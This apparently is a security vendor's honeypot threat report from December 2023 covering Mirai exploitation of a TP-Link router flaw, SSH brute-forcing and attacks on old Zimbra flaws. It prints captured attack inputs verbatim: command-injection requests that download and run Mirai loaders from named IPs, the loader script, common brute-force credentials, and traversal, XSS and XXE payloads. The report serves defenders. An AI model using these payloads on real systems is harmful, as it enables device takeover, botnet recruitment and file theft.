Our selection of alerts on honeypots: report 23 – December 2023

The following report consists of TEHTRIS observations on our worldwide honeypots network to provide you with information on what is going on the Internet. This actionable cyber threat intelligence is based on observations from a real and uncontrolled environment. Keeping track of trends and keeping an eye on what is actively scanned by threat actors in a reconnaissance phase allows to adequately adjust the cybersecurity posture.

Check out our previous report here.

Mirai botnet exploiting CVE-2023-1389 in TP-Link Archer AX21

During the past weeks, we monitored attempts to exploit CVE-2023-1389 in TP-Link Archer AX21 which was disclosed earlier this year. This command injection vulnerability allows an unauthenticated attack to inject commands, which would be run as root, with a simple POST request. We observed a peak on November 29^th.

In our case, TEHTRIS Deceptive Response captured two different requests:

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; rm -rf shk; wget http[:]//45.95.146[.]26/shk; chmod 777 shk; ./shk tplink; rm -rf shk`)

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; for pid in $(ls /proc | grep -E '^[0-9]+$'); do grep -q '(deleted)' /proc/$pid/maps && kill -9 $pid || true; done; rm -rf lol; wget http[:]//94.156.68[.]152/lol; chmod 777 lol; ./lol tplink; rm -rf lol`)

Both IP 45.95.146[.]26 and 94.156.68[.]152 are known for being associated with Mirai botnet, and indeed, this vulnerability has been added to the botnet’s arsenal in May 2023. The files that are meant to be downloaded are:

• shk (sha256 3ab790c0cd48d52b5d87a60b54cdd2b8ee07b9e21c84468564792670691d6d03), which downloads a payload  depending on the target architecture:

Content:

binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="45.95.146[.]26"
binname="miori"
binout="system"
exec="your device just got infected to a bootnoot"
rm -rf $binout
for arch in $binarys
cd /tmp
cd /var
cd /dev
wget http://$server_ip/$binname.$arch -O $binout
curl -O $binout http://$server_ip/$binname.$arch
tftp -g -l $binout -r $binname.$arch $server_ip
chmod 777 $binout
status=
./$binout $1
if [ "$status" = "$exec" ]

• lol (sha256 dd1a057b4e4ca17de8ea1a3f8b42caefcaa8529fc7e1e83b474ef70300add23d), similar to shk

IoCs

• 120.63.180[.]123 🇮🇳
• 185.224.128[.]160 🇳🇱
• 5.248.2[.]235 🇺🇦
• 185.224.128[.]31 🇳🇱
• 179.43.163[.]130 🇨🇭
• 45.95.146[.]26 🇳🇱
• 94.156.68[.]152 🇧🇬

SSH bruteforce attacks: ttx:ttx2011

SSH bruteforce attempts are relentless. In the past 30 days, the top 10 credentials used by threat actors are the following:

Login	Password
345gs5662d34	345gs5662d34
admin	admin
root	root
ubnt	ubnt
0	0
root	password
root	admin
root	123456
root	12345
root	3245gs5662d34

Between December 6^th and 8^th, we monitored a surge in connection attempts using credentials ttx:ttx2011 coming from 2,287 unique IP addresses.  

According to security researchers, these crendetials are used by ShellBot operators to compromise poorly secured Linux servers.

All of our honeypots were targeted by these bruteforce attempts. However, Taiwan accounted for 20% of all hits, Indonesia for 13%, and Singapore and Thailand for 9%.

IoCs

• 170.64.208[.]208
• 117.6.44[.]221
• 186.67.248[.]6
• 188.18.49[.]50
• 202.83.16.8
• 27.131.36[.]170
• 43.153.35[.]39
• 103.76.123[.]85
• 118.70.170[.]120
• 129.226.83[.]30

Attempts to exploit vulnerabilities in older versions of Zimbra

Zimbra is a collaborative software suite that includes an email server and a web client. This software is often targeted by threat actors – just recently, researchers pointed out that a zero-day flaw tracked as CVE-2023-37580 (CVSS3 6.1) was actively used in the wild to target international government organizations. Well, it appears that older Zimbra vulnerabilities are still used in the wild for initial access. These past two weeks, we observed two IP addresses attempting to exploit three Zimbra vulnerabilities:

• CVE-2013-7091 (CVSS N/A), a directory traversal vulnerability in Zimbra 7.2.2 and 8.0.2 allowing attackers to read arbitrary files. The exploit is available with Metasploit.

URL: /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

• CVE-2018-14013 (CVSS3 6.1), a cross-site scripting (XSS) vulnerability in versions before 8.8.11

URL decode:

/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action&cso=0&id=""></script><script>alert(document.domain)</script>

• CVE-2019-9670 (CVSS3 9.8), an XML External Entity Injection (XXE) vulnerability. The exploit is available with Metasploit.

URL:

Autodiscover/Autodiscover.xml

RawData:

'<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>'

IoCs

• 83.97.73[.]87
• 52.87.238[.]153

Exploit attempts against Zeroshell

Where do most attacks come from ?

---